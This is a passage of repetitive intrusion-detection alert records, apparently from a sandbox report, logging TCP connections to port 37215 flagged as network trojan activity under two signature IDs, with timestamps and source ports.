              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.801771
              SID:2829579
              Source Port:42354
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.230986
              SID:2829579
              Source Port:34682
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.873859
              SID:2835222
              Source Port:48434
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638258
              SID:2835222
              Source Port:47000
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.671552
              SID:2835222
              Source Port:41062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.530879
              SID:2835222
              Source Port:56824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.703507
              SID:2835222
              Source Port:50064
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.856961
              SID:2829579
              Source Port:55326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.308507
              SID:2829579
              Source Port:58766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.278013
              SID:2835222
              Source Port:51848
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726398
              SID:2829579
              Source Port:48482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.694776
              SID:2835222
              Source Port:55476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313750
              SID:2829579
              Source Port:46576
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.117355
              SID:2835222
              Source Port:55962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.738888
              SID:2835222
              Source Port:51184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188817
              SID:2829579
              Source Port:43088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625607
              SID:2829579
              Source Port:37386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.629539
              SID:2835222
              Source Port:50744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.920273
              SID:2835222
              Source Port:58822
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.630725
              SID:2835222
              Source Port:50404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187072
              SID:2835222
              Source Port:37120
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802384
              SID:2835222
              Source Port:37346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.210223
              SID:2829579
              Source Port:38918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.703548
              SID:2835222
              Source Port:57100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.579909
              SID:2829579
              Source Port:36988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.502307
              SID:2829579
              Source Port:37842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.538167
              SID:2835222
              Source Port:45938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.967851
              SID:2835222
              Source Port:50068
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.358873
              SID:2835222
              Source Port:52204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.696962
              SID:2835222
              Source Port:54326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.151137
              SID:2835222
              Source Port:33208
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.835108
              SID:2835222
              Source Port:38830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396332
              SID:2835222
              Source Port:46920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.121488
              SID:2829579
              Source Port:52222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.628035
              SID:2835222
              Source Port:38072
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.697432
              SID:2835222
              Source Port:50974
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.702613
              SID:2835222
              Source Port:38846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.332146
              SID:2829579
              Source Port:42834
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.489325
              SID:2829579
              Source Port:47480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098250
              SID:2835222
              Source Port:37620
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.605704
              SID:2829579
              Source Port:53312
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.662594
              SID:2835222
              Source Port:56962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.164542
              SID:2829579
              Source Port:48080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.156446
              SID:2835222
              Source Port:34380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.076308
              SID:2829579
              Source Port:45886
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638517
              SID:2835222
              Source Port:44232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727629
              SID:2835222
              Source Port:48992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.749698
              SID:2835222
              Source Port:48218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.329560
              SID:2829579
              Source Port:54572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.676397
              SID:2835222
              Source Port:47236
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.576454
              SID:2829579
              Source Port:52928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802811
              SID:2835222
              Source Port:48082
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.858368
              SID:2835222
              Source Port:60194
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.098867
              SID:2829579
              Source Port:54296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.130251
              SID:2829579
              Source Port:48744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.537770
              SID:2835222
              Source Port:36134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.817857
              SID:2829579
              Source Port:54046
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.374671
              SID:2835222
              Source Port:36104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.123705
              SID:2835222
              Source Port:55722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.570645
              SID:2835222
              Source Port:41750
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.109474
              SID:2829579
              Source Port:49248
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.264778
              SID:2829579
              Source Port:36042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.430669
              SID:2829579
              Source Port:42500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.128270
              SID:2835222
              Source Port:48018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.109318
              SID:2835222
              Source Port:37094
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.120750
              SID:2829579
              Source Port:60048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.856919
              SID:2835222
              Source Port:58730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.361565
              SID:2835222
              Source Port:53010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.231719
              SID:2835222
              Source Port:51740
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.516262
              SID:2835222
              Source Port:54380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.623438
              SID:2835222
              Source Port:49626
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.761812
              SID:2835222
              Source Port:45784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.522302
              SID:2829579
              Source Port:34354
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.482098
              SID:2835222
              Source Port:43628
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.049128
              SID:2829579
              Source Port:47266
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.108830
              SID:2835222
              Source Port:52430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926708
              SID:2835222
              Source Port:50448
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.595503
              SID:2835222
              Source Port:44784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.231726
              SID:2829579
              Source Port:41538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.967165
              SID:2829579
              Source Port:50492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.368700
              SID:2835222
              Source Port:44250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.449206
              SID:2829579
              Source Port:46556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.484251
              SID:2835222
              Source Port:58042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.859039
              SID:2835222
              Source Port:35944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.121516
              SID:2835222
              Source Port:52376
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.435289
              SID:2835222
              Source Port:45588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.249756
              SID:2829579
              Source Port:49896
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.402714
              SID:2835222
              Source Port:50460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.391652
              SID:2835222
              Source Port:57706
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.251717
              SID:2835222
              Source Port:38616
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625681
              SID:2829579
              Source Port:57968
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.481991
              SID:2835222
              Source Port:54830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313638
              SID:2835222
              Source Port:46260
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.049923
              SID:2829579
              Source Port:37826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.202466
              SID:2829579
              Source Port:57478
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.578719
              SID:2829579
              Source Port:34080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.502830
              SID:2835222
              Source Port:59556
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.446477
              SID:2835222
              Source Port:53686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.065779
              SID:2829579
              Source Port:43988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397802
              SID:2835222
              Source Port:55090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.493090
              SID:2835222
              Source Port:33124
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.063230
              SID:2829579
              Source Port:45180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.878128
              SID:2829579
              Source Port:53752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.882516
              SID:2829579
              Source Port:56824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.990918
              SID:2829579
              Source Port:41936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726767
              SID:2829579
              Source Port:58808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.431498
              SID:2835222
              Source Port:60666
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.696986
              SID:2829579
              Source Port:46618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.456430
              SID:2835222
              Source Port:37260
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.544207
              SID:2829579
              Source Port:57372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.548486
              SID:2835222
              Source Port:42206
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.639455
              SID:2835222
              Source Port:59966
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.097380
              SID:2829579
              Source Port:43676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.689850
              SID:2835222
              Source Port:46904
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.549289
              SID:2829579
              Source Port:58498
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188646
              SID:2835222
              Source Port:42418
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.156327
              SID:2829579
              Source Port:33254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.111870
              SID:2835222
              Source Port:33874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.341423
              SID:2829579
              Source Port:42144
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.118191
              SID:2835222
              Source Port:57308
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.504976
              SID:2829579
              Source Port:57618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.481874
              SID:2835222
              Source Port:34532
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396727
              SID:2829579
              Source Port:43820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725716
              SID:2835222
              Source Port:34874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.154135
              SID:2835222
              Source Port:47024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.928658
              SID:2835222
              Source Port:39062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.490894
              SID:2829579
              Source Port:41586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.621837
              SID:2829579
              Source Port:60310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.642145
              SID:2829579
              Source Port:35554
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.400732
              SID:2835222
              Source Port:41476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.636254
              SID:2835222
              Source Port:45640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.113235
              SID:2829579
              Source Port:36840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.639388
              SID:2829579
              Source Port:33126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.279553
              SID:2835222
              Source Port:49580
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.584986
              SID:2829579
              Source Port:41666
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.268487
              SID:2835222
              Source Port:46894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.114137
              SID:2835222
              Source Port:39128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.707794
              SID:2835222
              Source Port:54028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188363
              SID:2829579
              Source Port:42200
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.309267
              SID:2835222
              Source Port:47284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726529
              SID:2835222
              Source Port:36518
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.492186
              SID:2829579
              Source Port:50600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.764966
              SID:2835222
              Source Port:40504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.923213
              SID:2835222
              Source Port:59710
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.600631
              SID:2835222
              Source Port:51548
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.625630
              SID:2835222
              Source Port:43770
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.066200
              SID:2835222
              Source Port:56860
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.448740
              SID:2835222
              Source Port:51916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.457748
              SID:2829579
              Source Port:43766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.065746
              SID:2835222
              Source Port:55976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.169188
              SID:2835222
              Source Port:52250
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.665002
              SID:2835222
              Source Port:50160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.123133
              SID:2829579
              Source Port:58092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.635834
              SID:2835222
              Source Port:52776
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.530826
              SID:2835222
              Source Port:55964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.334155
              SID:2835222
              Source Port:49686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.677412
              SID:2835222
              Source Port:44496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802767
              SID:2835222
              Source Port:33714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.551393
              SID:2835222
              Source Port:56612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.633109
              SID:2835222
              Source Port:43960
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.573861
              SID:2829579
              Source Port:55078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.101703
              SID:2829579
              Source Port:56856
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.824698
              SID:2829579
              Source Port:60082
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.196806
              SID:2829579
              Source Port:33570
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.268600
              SID:2835222
              Source Port:34728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.598369
              SID:2835222
              Source Port:50598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.149005
              SID:2829579
              Source Port:59812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061914
              SID:2829579
              Source Port:44172
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.467841
              SID:2829579
              Source Port:41932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.868691
              SID:2835222
              Source Port:59584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.372513
              SID:2835222
              Source Port:42460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.695243
              SID:2835222
              Source Port:36372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061484
              SID:2835222
              Source Port:44038
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.124819
              SID:2829579
              Source Port:59332
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.118787
              SID:2829579
              Source Port:33678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.573196
              SID:2835222
              Source Port:56178
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.540023
              SID:2829579
              Source Port:58986
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.546777
              SID:2829579
              Source Port:48478
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.231565
              SID:2835222
              Source Port:39858
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.493207
              SID:2829579
              Source Port:41380
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.123256
              SID:2835222
              Source Port:56264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.662510
              SID:2829579
              Source Port:42548
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.150953
              SID:2835222
              Source Port:40700
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.536061
              SID:2835222
              Source Port:36862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535989
              SID:2835222
              Source Port:55016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.449183
              SID:2835222
              Source Port:46482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.671494
              SID:2835222
              Source Port:47394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.727306
              SID:2835222
              Source Port:44148
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.355014
              SID:2829579
              Source Port:38280
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186436
              SID:2835222
              Source Port:40112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.530912
              SID:2835222
              Source Port:44234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.803128
              SID:2829579
              Source Port:54844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.495438
              SID:2835222
              Source Port:52364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624843
              SID:2829579
              Source Port:49714
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.921016
              SID:2829579
              Source Port:53252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638442
              SID:2829579
              Source Port:43938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.817713
              SID:2829579
              Source Port:52338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
